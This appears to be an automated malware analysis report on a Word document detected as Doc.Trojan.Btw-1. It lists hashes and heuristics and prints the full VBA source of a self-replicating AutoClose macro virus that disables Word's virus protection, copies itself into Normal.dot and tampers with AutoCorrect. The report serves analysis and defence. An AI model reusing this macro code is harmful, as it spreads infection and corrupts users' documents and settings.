Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6599647bd586c869…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2001-07-04 13:55:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 382daa1f2e56d9258a90fd69f43c731c
SHA-1: d452f60efd44739e5c8887f393737fbbc106ef2d
SHA-256: 6599647bd586c86997674468dc1757a17ebbf4b442ebe36c45181ab315441ac4
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a Word document containing a malicious VBA macro, specifically an AutoClose macro (run automatically when the document is closed), which is a known technique for macro-virus propagation. The script attempts to disable Word's macro virus protection and copy its own module into the Normal.dot template, indicating an intent to infect the user's Word environment so that every subsequently opened document inherits it. The ClamAV detection further confirms its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Btw-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Btw-1
  • VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1490 bytes
SHA-256: 1bc714c8a69bdc668ca4eacdb2dcf0d892a58fdeb481d4d7a1d0db23a54425ef
Detection
ClamAV: Doc.Trojan.Btw-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoR"
Sub AutoClose()
Attribute AutoClose.VB_Description = "Ěŕęđîń ńîçäŕí "
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.AutoR.AutoClose"
'Autor
'An ordinary little virus...  Absolutely harmless
'With its help you will learn Word faster :-)))

  On Error Resume Next
  Application.Options.VirusProtection = False
  Application.Options.SaveNormalPrompt = False
  Application.Options.ConfirmConversions = False
  
    Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Autor", wdOrganizerObjectProjectItems
  
  If NormalTemplate.Saved = False Then NormalTemplate.Save

    myValue = ", ęńňŕňč,"
    Ol = True
    For Each anEntry In AutoCorrect.Entries
        If anEntry.Name = myValue Then Ol = False
    Next anEntry
    If Ol Then NormalTemplate.Application.AutoCorrect.Entries.Add Name:=",", Value:=myValue
    
    s = ""
    NormalTemplate.VBProject.VBComponents("AutoR").Export ("c:\Repeat.tmp")
    ActiveDocument.VBProject.VBComponents.Import ("c:\Repeat.tmp")
    ActiveDocument.SaveAs ActiveDocument.FullName
    Kill ("c:\Repeat.tmp")

End Sub